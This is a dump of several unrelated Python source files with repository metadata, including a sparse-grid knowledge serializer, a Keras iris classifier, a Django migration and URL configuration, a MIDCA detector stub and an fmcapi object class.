# restore surpluses: {iteration: {qoi: {dtype: {t: <list float>}}}}
key = '_ASGCKnowledge__alphas'
if key in jsonObject:
alphas = {}
for iteration, v1 in jsonObject[key].items():
d1 = {}
for qoi, v2 in v1.items():
d2 = {}
for dtype, v3 in v2.items():
d3 = {}
for t, alpha in v3.items():
d3[float(t)] = DataVector(alpha).array()
d2[int(dtype)] = d3
d1[qoi] = d2
alphas[int(iteration)] = d1
knowledge.setAlphas(alphas)
return knowledge
def toJson(self):
"""
@return: a string that represents the object
"""
serializationString = '"module" : "' + \
self.__module__ + '",\n'
attrName = "_ASGCKnowledge__alphas"
attrValue = self.__getattribute__(attrName)
serializationString += ju.parseAttribute(attrValue, attrName)
attrName = "_ASGCKnowledge__grids"
attrValue = self.__getattribute__(attrName)
serializationString += ju.parseAttribute(attrValue, attrName)
attrName = "_ASGCKnowledge__iteration"
attrValue = self.__getattribute__(attrName)
serializationString += ju.parseAttribute(attrValue, attrName)
s = serializationString.rstrip(",\n")
# print "j-------------------------------------------"
# print "{" + s + "}"
# print "j-------------------------------------------"
return "{" + s + "}"
def __str__(self):
return "%i, alphas=%i, grids=%i" % (self.__iteration,
len(self.__alphas),
len(self.__grids))
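# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration, not part of the original
# module). update() stores a surplus vector under the nested layout
# {iteration: {qoi: {dtype: {t: alpha}}}}; `grid` and `alpha` stand for any
# pysgpp grid and matching coefficient array.
# ---------------------------------------------------------------------------
# knowledge = ASGCKnowledge()
# knowledge.update(grid, alpha, qoi='_', t=0,
#                  dtype=KnowledgeTypes.SIMPLE, iteration=0)
# grid, alpha = knowledge.getSparseGridFunction(qoi='_', t=0,
#                                               dtype=KnowledgeTypes.SIMPLE)
# knowledge.writeToFile('knowledge.json')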
|
[
"dirk.pflueger@ipvs.uni-stuttgart.de"
] |
dirk.pflueger@ipvs.uni-stuttgart.de
|
4e63a72eaba3f13bff579913c6fdfd0aca1897d5
|
dc2a3ce315feec4757bc41215faff57ffdf546a0
|
/Classification/classification.py
|
724029a5f06b46a72a69f9da079f1008d42d44da
|
[] |
no_license
|
heheli1998/Keras
|
d35247474eedc3266679c6f144f7d7713445bfc0
|
fe0f98c17b394ceed8839dd45da568cc97b5a0fd
|
refs/heads/master
| 2020-09-16T08:02:58.190007
| 2019-11-24T09:06:37
| 2019-11-24T09:06:37
| 223,706,332
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,882
|
py
|
from sklearn import datasets
import numpy as np
from keras.models import Sequential
from keras.layers import Dense
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import KFold
from keras.layers import Dropout
from keras.optimizers import SGD
from keras.constraints import maxnorm
from keras.callbacks import LearningRateScheduler
from math import pow,floor
# load the iris dataset
dataset = datasets.load_iris()
x = dataset.data
Y = dataset.target
seed = 7
np.random.seed(seed)
# function that builds the model
def create_model(init='glorot_uniform'):
    # build the model
model = Sequential()
# model.add(Dropout(rate=0.2,input_shape=(4,)))
model.add(Dense(units=4,activation='relu',input_dim=4,kernel_initializer=init)) #kernel_constraint=maxnorm(3)))
# model.add(Dropout(rate=0.2))
model.add(Dense(units=6, activation='relu', kernel_initializer=init))#kernel_constraint=maxnorm(3)))
# model.add(Dropout(rate=0.2))
model.add(Dense(units=3, activation='softmax',kernel_initializer=init))
learningRate = 0.1
momentum = 0.9
decay_rate = 0.0
sgd = SGD(lr=learningRate, momentum=momentum, decay=decay_rate, nesterov=False)
model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
return model
# learning-rate schedule and model training
def step_decay(epoch):
init_lrate = 0.1
drop = 0.5
epoch_drop = 10
    # halve the learning rate every `epoch_drop` epochs: floor must wrap the whole quotient
    lrate = init_lrate * pow(drop, floor((1 + epoch) / epoch_drop))
return lrate
lrate = LearningRateScheduler(step_decay)
epochs = 200
model = KerasClassifier(build_fn=create_model,epochs=epochs,batch_size=5,verbose=1,callbacks=[lrate])
# kfold = KFold(n_splits=10,shuffle=True,random_state=seed) #交叉验证
# results = cross_val_score(model,x,Y,cv=kfold)
# print('Accuracy:%.2f%% (%.2f)' % (results.mean()*100, results.std()))
model.fit(x,Y)
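# --- Added illustrative check (not part of the original script): with the
# corrected step_decay() above the learning rate halves every 10 epochs
# (0.1, 0.05, 0.025, ...).
for e in (0, 10, 20, 30):
    print('epoch %d -> learning rate %.5f' % (e, step_decay(e)))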
|
[
"heheli1998@163.com"
] |
heheli1998@163.com
|
dd361d96adb18cce06be249bb17bbb8bac0e4f9e
|
564bb8953ad74f25bb81831c6280e98a5e8ca75a
|
/tweet/migrations/0002_auto_20200322_0845.py
|
53775cbd5cd1f4f0350bf2d80691b0b8d20de3d6
|
[] |
no_license
|
MohamedHany2002/my-twitter
|
600c083c10c006074dd1aa55d112291c731f8bc4
|
5f7048c3fd00a894b7c5de580954747e6421b77d
|
refs/heads/master
| 2022-07-03T09:12:34.741192
| 2020-05-12T15:29:41
| 2020-05-12T15:29:41
| 263,376,530
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 890
|
py
|
# Generated by Django 2.2.7 on 2020-03-22 06:45
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('tweet', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='tweet',
name='created',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='tweet',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='tweets', to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
]
|
[
"goldenhany94@gmail.com"
] |
goldenhany94@gmail.com
|
22b9d9e66e5210c42c0ef9b33d420d68606ed622
|
4d78a5835fb413a565957a432464a27fed7d80e8
|
/midca/modules/interpret/InformedDiscrepancyDetector.py
|
2b39b0e4191c9fc57935819c81ca73afd37f6cf7
|
[
"MIT"
] |
permissive
|
COLAB2/midca
|
0daac59415eaf418aebb4578deba19cd82d24760
|
abd41ab91d8a4e9582860a55b5b10657d0a560e0
|
refs/heads/master
| 2023-06-23T05:34:13.837128
| 2022-05-03T18:13:11
| 2022-05-03T18:13:11
| 106,867,470
| 18
| 6
|
MIT
| 2021-06-10T12:39:46
| 2017-10-13T19:53:01
|
Python
|
UTF-8
|
Python
| false
| false
| 1,367
|
py
|
import copy
from midca.modules.interpret._adist import ADistance, ChangeFinder, WindowPair, Interval
from midca.domains.nbeacons import nbeacons_util
import sys
class InformedDiscrepancyDetector:
'''
Performs Discrepancy Detection using Informed Expectations
TODO: This is a stub for now, not implemented yet
'''
def __init__(self):
pass
def init(self, world, mem):
self.world = world
self.mem = mem
def get_current_plan(self):
'''
Returns the current plan the agent is using
'''
pass
def generate_inf_exp(self, plan, prev_action):
'''
Returns a set of atoms to check against the state given the previous action
the agent executed and the current plan
See Dannenhauer & Munoz-Avila IJCAI-2015 / Dannenhauer, Munoz-Avila, Cox IJCAI-2016
for more information on informed expectations
TODO: finish
'''
# sanity check, make sure prev_action is in the plan
if prev_action not in plan:
raise Exception("Cannot generate informed expectations: prev_action "+str(prev_action)+" was not given plan")
exp = [] # expectations accumulator
        return exp  # TODO: populate with informed expectations before returning
def run(self, cycle, verbose=2):
prev_action = self.mem.get(self.mem.ACTIONS)[-1]
curr_goals = self.mem.get(self.mem.CURRENT_GOALS)
plan = self.mem.get(self.mem.GOAL_GRAPH).get_best_plan(curr_goals)
        inf_exp = self.generate_inf_exp(plan, prev_action)
for e in inf_exp:
pass
|
[
"sampath.gogineni@gmail.com"
] |
sampath.gogineni@gmail.com
|
2375332da2211a3bce2093cfd124276215bd804d
|
e5af6abb44dec19a607a11981af7b3d12f9d59c7
|
/day11/ch2.py
|
986d6e08d0d155f1497bee38f9ecdd1591cab049
|
[] |
no_license
|
jakubmatyszewski/adventofcode2020
|
ec1cbcfe0f35d3218bf9c8853ac85983cf995dfd
|
aafce6cb1d7c97b5eb2c3964298069eca44747a2
|
refs/heads/master
| 2023-02-16T17:02:50.231903
| 2021-01-02T23:41:19
| 2021-01-02T23:44:46
| 319,111,724
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,439
|
py
|
def rotation(arr):
new_arr = []
xd = len(arr) # x dimension
yd = len(arr[0]) # y dimension
for row in range(xd):
tmp_row = ''
for col in range(yd):
adj = []
for x in (-1, 0, 1):
for y in (-1, 0, 1):
i = 1
if x == y == 0:
continue
while 0 <= row + i * x < xd and 0 <= col + i * y < yd:
if (place := arr[row + i * x][col + i * y]) != '.':
adj.append(place)
break
i += 1
if arr[row][col] == 'L' and '#' not in adj:
tmp_row += '#'
elif arr[row][col] == '#' and adj.count('#') >= 5:
tmp_row += 'L'
else:
tmp_row += arr[row][col]
new_arr.append(tmp_row)
return new_arr
def challenge(arr):
while True:
output = rotation(arr)
if output == arr:
return ''.join(arr).count('#')
arr = output
def from_txt(filepath='input.txt'):
try:
array = open(filepath, 'r').read().splitlines()
except FileNotFoundError:
filepath = input("Enter full path to input file.\n")
array = open(filepath, 'r').read().splitlines()
return array
if __name__ == "__main__":
input_array = from_txt()
print(challenge(input_array))
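    # --- Added sanity check (not part of the original solution): on a tiny
    # 1x3 grid both end seats see no occupied seat, fill up, and then stay
    # occupied, so the stable occupied count is 2.
    assert challenge(["L.L"]) == 2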
|
[
"jakubmatyszewski1@gmail.com"
] |
jakubmatyszewski1@gmail.com
|
ffd75793ca5d720d2024a3556765bc80e7c4c7e1
|
c2dae49452480b7611e7dcfe90cc1e97af667e45
|
/accounts/serializers.py
|
7638fc69df2064f2f74dbd3d0c717498910e62fb
|
[] |
no_license
|
jcperezbanuchi/barbershop_app
|
ad8792dc3854c554b80e8b8e8ac2c139ac925cbd
|
5288335bfc0562f2f8d2f7923b51a510c1966fa7
|
refs/heads/main
| 2023-05-31T21:54:23.483059
| 2021-07-13T20:06:48
| 2021-07-13T20:06:48
| 383,232,905
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,029
|
py
|
from rest_framework import serializers
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
# user serializer
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('id', 'username', 'email')
# register serializer
class RegisterSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('id', 'username', 'email', 'password')
extra_kwargs = {'password': {'write_only': True}}
def create(self, validated_data):
user = User.objects.create_user(validated_data['username'], validated_data['email'], validated_data['password'])
return user
# login serializer
class LoginSerializer(serializers.Serializer):
    username = serializers.CharField()
    password = serializers.CharField()
def validate(self, data):
user = authenticate(**data)
if user and user.is_active:
return user
raise serializers.ValidationError('Incorrect Credentials')
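# --- Added usage sketch (hypothetical, not part of the original app): how a
# view might drive RegisterSerializer; request_data stands in for request.data.
def register_user(request_data):
    """Illustrative only: validate registration input and create the user."""
    serializer = RegisterSerializer(data=request_data)
    serializer.is_valid(raise_exception=True)
    return serializer.save()  # save() calls RegisterSerializer.create() above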
|
[
"juanco@Juans-Air"
] |
juanco@Juans-Air
|
7c37e6aef8973598ad64ad4f06841a103149c17a
|
9ae3a94afb8a7affcfb9eba8ed041099d2b5c13b
|
/estimators/linear_model.py
|
19ee30c868bd68f7be26f8ddc87a7e82cf15e003
|
[] |
no_license
|
Leo-Bright/TensorFlow2.0
|
83bd07ce0cbbb2381f3bff54451c097754016b28
|
72b33332d0a57d9855f67499979925162122000d
|
refs/heads/master
| 2020-06-18T11:40:07.733003
| 2019-08-11T15:27:02
| 2019-08-11T15:27:02
| 196,292,248
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,019
|
py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from IPython.display import clear_output
from six.moves import urllib
import tensorflow.compat.v2.feature_column as fc
import tensorflow as tf
from sklearn.metrics import roc_curve
# Load dataset.
dftrain = pd.read_csv('datasets/titanic/train.csv')
dfeval = pd.read_csv('datasets/titanic/eval.csv')
y_train = dftrain.pop('survived')
y_eval = dfeval.pop('survived')
# print(dftrain.head())
dftrain.age.hist(bins=20)
dftrain.sex.value_counts().plot(kind='barh')
CATEGORICAL_COLUMNS = ['sex', 'n_siblings_spouses', 'parch', 'class', 'deck',
'embark_town', 'alone']
NUMERIC_COLUMNS = ['age', 'fare']
feature_columns = []
for feature_name in CATEGORICAL_COLUMNS:
vocabulary = dftrain[feature_name].unique()
feature_columns.append(tf.feature_column.categorical_column_with_vocabulary_list(feature_name, vocabulary))
for feature_name in NUMERIC_COLUMNS:
feature_columns.append(tf.feature_column.numeric_column(feature_name, dtype=tf.float32))
def make_input_fn(data_df, label_df, num_epochs=10, shuffle=True, batch_size=32):
def input_function():
ds = tf.data.Dataset.from_tensor_slices((dict(data_df), label_df))
if shuffle:
ds = ds.shuffle(1000)
ds = ds.batch(batch_size).repeat(num_epochs)
return ds
return input_function
train_input_fn = make_input_fn(dftrain, y_train)
eval_input_fn = make_input_fn(dfeval, y_eval, num_epochs=1, shuffle=False)
ds = make_input_fn(dftrain, y_train, batch_size=10)()
for feature_batch, label_batch in ds.take(1):
print('Some feature keys:', list(feature_batch.keys()))
print()
print('A batch of class:', feature_batch['class'].numpy())
print()
print('A batch of Labels:', label_batch.numpy())
age_column = feature_columns[7]
tf.keras.layers.DenseFeatures([age_column])(feature_batch).numpy()
gender_column = feature_columns[0]
tf.keras.layers.DenseFeatures([tf.feature_column.indicator_column(gender_column)])(feature_batch).numpy()
linear_est = tf.estimator.LinearClassifier(feature_columns=feature_columns)
linear_est.train(train_input_fn)
result = linear_est.evaluate(eval_input_fn)
clear_output()
print(result)
age_x_gender = tf.feature_column.crossed_column(['age', 'sex'], hash_bucket_size=100)
derived_feature_columns = [age_x_gender]
linear_est = tf.estimator.LinearClassifier(feature_columns=feature_columns+derived_feature_columns)
linear_est.train(train_input_fn)
result = linear_est.evaluate(eval_input_fn)
clear_output()
print(result)
pred_dicts = list(linear_est.predict(eval_input_fn))
probs = pd.Series([pred['probabilities'][1] for pred in pred_dicts])
probs.plot(kind='hist', bins=20, title='predicted probabilities')
fpr, tpr, _ = roc_curve(y_eval, probs)
plt.plot(fpr, tpr)
plt.title('ROC curve')
plt.xlabel('false positive rate')
plt.ylabel('true positive rate')
plt.xlim(0,)
plt.ylim(0,)
plt.show()
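# --- Added illustrative metric (not part of the original script): summarize the
# same eval predictions with a single AUC value via scikit-learn.
from sklearn.metrics import roc_auc_score
print('ROC AUC: %.3f' % roc_auc_score(y_eval, probs))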
|
[
"564312023@qq.com"
] |
564312023@qq.com
|
e10f76bdb851ff9faa30ab7ffb5dfac9ac70f5e4
|
56482e0b2ce6517fff41d0f78e0c0ed000d977a1
|
/fmcapi/api_objects/object_services/variablesets.py
|
6d55f6aeb55cabfd00004ef6be0d725acdb058fb
|
[
"BSD-3-Clause"
] |
permissive
|
banzigaga/fmcapi
|
ab4d7aaaf4be4f2b0686d07b6272f8b9531577da
|
fd924de96e200ca8e0d5088b27a5abaf6f915bc6
|
refs/heads/master
| 2020-12-11T14:45:07.896571
| 2019-12-12T20:02:07
| 2019-12-12T20:02:07
| 233,876,405
| 1
| 0
|
BSD-3-Clause
| 2020-01-14T15:46:26
| 2020-01-14T15:46:26
| null |
UTF-8
|
Python
| false
| false
| 1,588
|
py
|
"""Variable Sets Class."""
from fmcapi.api_objects.apiclasstemplate import APIClassTemplate
import logging
import warnings
class VariableSets(APIClassTemplate):
"""The VariableSets Object in the FMC."""
VALID_JSON_DATA = ["id", "name", "type", "description"]
VALID_FOR_KWARGS = VALID_JSON_DATA + []
URL_SUFFIX = "/object/variablesets"
def __init__(self, fmc, **kwargs):
"""
Initialize VariableSets object.
:param fmc: (object) FMC object
:param kwargs: Any other values passed during instantiation.
:return: None
"""
super().__init__(fmc, **kwargs)
logging.debug("In __init__() for VariableSets class.")
self.parse_kwargs(**kwargs)
def post(self):
"""POST method for API for VariableSets not supported."""
logging.info("POST method for API for VariableSets not supported.")
pass
def put(self):
"""PUT method for API for VariableSets not supported."""
logging.info("PUT method for API for VariableSets not supported.")
pass
def delete(self):
"""DELETE method for API for VariableSets not supported."""
logging.info("DELETE method for API for VariableSets not supported.")
pass
class VariableSet(VariableSets):
"""
Dispose of this Class after 20210101.
Use VariableSets() instead.
"""
def __init__(self, fmc, **kwargs):
warnings.resetwarnings()
warnings.warn("Deprecated: VariableSet() should be called via VariableSets().")
super().__init__(fmc, **kwargs)
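# --- Added usage sketch (not part of the module; host and credentials are made
# up): fetch all variable sets from an FMC. fmcapi.FMC() is assumed to be the
# usual connection context manager; get() is inherited from APIClassTemplate.
def list_variable_sets(host, username, password):
    """Illustrative only: return the variable sets known to the given FMC."""
    import fmcapi
    with fmcapi.FMC(host=host, username=username, password=password) as fmc1:
        return VariableSets(fmc=fmc1).get()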
|
[
"dmickels@cisco.com"
] |
dmickels@cisco.com
|
d2c11e7a18fdf03551a270f0adb16eb6a7b4a84c
|
3b660ddf98c162535558d5d8b90656cddf67554a
|
/acl_project/settings.py
|
a4bfa3d6482911272e27d8c9b3bc72583334cc82
|
[] |
no_license
|
kylenicola/acl_project
|
a22acf068ebbdf075ade01332c85226209a8e41a
|
5690cb5402094e6459d1721590ba84a0b74433cb
|
refs/heads/master
| 2020-05-17T15:15:48.870040
| 2014-07-09T02:42:40
| 2014-07-09T02:42:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,014
|
py
|
"""
Django settings for acl_project project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '8*_o2))08o_vt3af5=ncw&^60i(11h&9bhcs_!ec=#g+*-lg+='
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'acl_app',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'acl_project.urls'
WSGI_APPLICATION = 'acl_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Chicago'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
|
[
"kyle.a.nicola@utexas.edu"
] |
kyle.a.nicola@utexas.edu
|
0cb53c5f1f5e228f46b876f1f6b566519a1b9b0e
|
cdeeeb769e70b8fc87eabd15fd2d18e5438d3215
|
/project/epi/urls.py
|
000eebe45973e759af0ac1b43a9766a1e9660eb7
|
[
"MIT"
] |
permissive
|
nlewycky/hawc
|
b897be18499fcd018c0c5e8ba866db3e9f360bc9
|
8310ab549ea6bcc2d890314258ebef8f04970be3
|
refs/heads/master
| 2020-05-18T09:02:03.045370
| 2019-04-11T10:43:12
| 2019-04-11T10:43:12
| 184,313,167
| 0
| 0
| null | 2019-04-30T18:37:14
| 2019-04-30T18:37:13
| null |
UTF-8
|
Python
| false
| false
| 5,054
|
py
|
from django.conf.urls import url, include
from rest_framework.routers import DefaultRouter
from . import api, views
router = DefaultRouter()
router.register(r'study-population', api.StudyPopulation, base_name="study-population")
router.register(r'exposure', api.Exposure, base_name="exposure")
router.register(r'outcome', api.Outcome, base_name="outcome")
router.register(r'result', api.Result, base_name="result")
router.register(r'comparison-set', api.ComparisonSet, base_name="set")
router.register(r'group', api.Group, base_name="group")
router.register(r'outcome-cleanup', api.OutcomeCleanup, base_name="outcome-cleanup")
urlpatterns = [
url(r'^api/', include(router.urls, namespace='api')),
# Criteria
url(r'^assessment/(?P<pk>\d+)/study-criteria/create/$',
views.StudyCriteriaCreate.as_view(),
name='studycriteria_create'),
# Adjustment factors
url(r'^assessment/(?P<pk>\d+)/adjustment-factor/create/$',
views.AdjustmentFactorCreate.as_view(),
name='adjustmentfactor_create'),
# Study population
url(r'^study/(?P<pk>\d+)/study-population/create/$',
views.StudyPopulationCreate.as_view(),
name='sp_create'),
url(r'^study/(?P<pk>\d+)/study-population/copy-as-new-selector/$',
views.StudyPopulationCopyAsNewSelector.as_view(),
name='sp_copy_selector'),
url(r'^study-population/(?P<pk>\d+)/$',
views.StudyPopulationDetail.as_view(),
name='sp_detail'),
url(r'^study-population/(?P<pk>\d+)/update/$',
views.StudyPopulationUpdate.as_view(),
name='sp_update'),
url(r'^study-population/(?P<pk>\d+)/delete/$',
views.StudyPopulationDelete.as_view(),
name='sp_delete'),
# Exposure
url(r'^study/(?P<pk>\d+)/exposure/create/$',
views.ExposureCreate.as_view(),
name='exp_create'),
url(r'^study/(?P<pk>\d+)/exposure/copy-as-new-selector/$',
views.ExposureCopyAsNewSelector.as_view(),
name='exp_copy_selector'),
url(r'^exposure/(?P<pk>\d+)/$',
views.ExposureDetail.as_view(),
name='exp_detail'),
url(r'^exposure/(?P<pk>\d+)/update/$',
views.ExposureUpdate.as_view(),
name='exp_update'),
url(r'^exposure/(?P<pk>\d+)/delete/$',
views.ExposureDelete.as_view(),
name='exp_delete'),
# Outcome
url(r'^assessment/(?P<pk>\d+)/export/$',
views.OutcomeExport.as_view(),
name='outcome_export'),
url(r'^assessment/(?P<pk>\d+)/outcomes/$',
views.OutcomeList.as_view(),
name='outcome_list'),
url(r'^study-population/(?P<pk>\d+)/outcome/create/$',
views.OutcomeCreate.as_view(),
name='outcome_create'),
url(r'^study-population/(?P<pk>\d+)/outcome/copy-as-new-selector/$',
views.OutcomeCopyAsNewSelector.as_view(),
name='outcome_copy_selector'),
url(r'^outcome/(?P<pk>\d+)/$',
views.OutcomeDetail.as_view(),
name='outcome_detail'),
url(r'^outcome/(?P<pk>\d+)/update/$',
views.OutcomeUpdate.as_view(),
name='outcome_update'),
url(r'^outcome/(?P<pk>\d+)/delete/$',
views.OutcomeDelete.as_view(),
name='outcome_delete'),
# Results
url(r'^outcome/(?P<pk>\d+)/result/create/$',
views.ResultCreate.as_view(),
name='result_create'),
url(r'^outcome/(?P<pk>\d+)/result/copy-as-new-selector/$',
views.ResultCopyAsNewSelector.as_view(),
name='result_copy_selector'),
url(r'^result/(?P<pk>\d+)/$',
views.ResultDetail.as_view(),
name='result_detail'),
url(r'^result/(?P<pk>\d+)/update/$',
views.ResultUpdate.as_view(),
name='result_update'),
url(r'^result/(?P<pk>\d+)/delete/$',
views.ResultDelete.as_view(),
name='result_delete'),
# Comparison set
url(r'^study-population/(?P<pk>\d+)/comparison-set/create/$',
views.ComparisonSetCreate.as_view(),
name='cs_create'),
url(r'^study-population/(?P<pk>\d+)/comparison-set/copy-as-new-selector/$',
views.ComparisonSetStudyPopCopySelector.as_view(),
name='cs_copy_selector'),
url(r'^outcome/(?P<pk>\d+)/comparison-set/create/$',
views.ComparisonSetOutcomeCreate.as_view(),
name='cs_outcome_create'),
url(r'^outcome/(?P<pk>\d+)/comparison-set/copy-as-new-selector/$',
views.ComparisonSetOutcomeCopySelector.as_view(),
name='cs_outcome_copy_selector'),
url(r'^comparison-set/(?P<pk>\d+)/$',
views.ComparisonSetDetail.as_view(),
name='cs_detail'),
url(r'^comparison-set/(?P<pk>\d+)/update/$',
views.ComparisonSetUpdate.as_view(),
name='cs_update'),
url(r'^comparison-set/(?P<pk>\d+)/delete/$',
views.ComparisonSetDelete.as_view(),
name='cs_delete'),
# Groups (in comparison set)
url(r'^group/(?P<pk>\d+)/$',
views.GroupDetail.as_view(),
name='g_detail'),
url(r'^group/(?P<pk>\d+)/update/$',
views.GroupUpdate.as_view(),
name='g_update'),
]
|
[
"shapiromatron@gmail.com"
] |
shapiromatron@gmail.com
|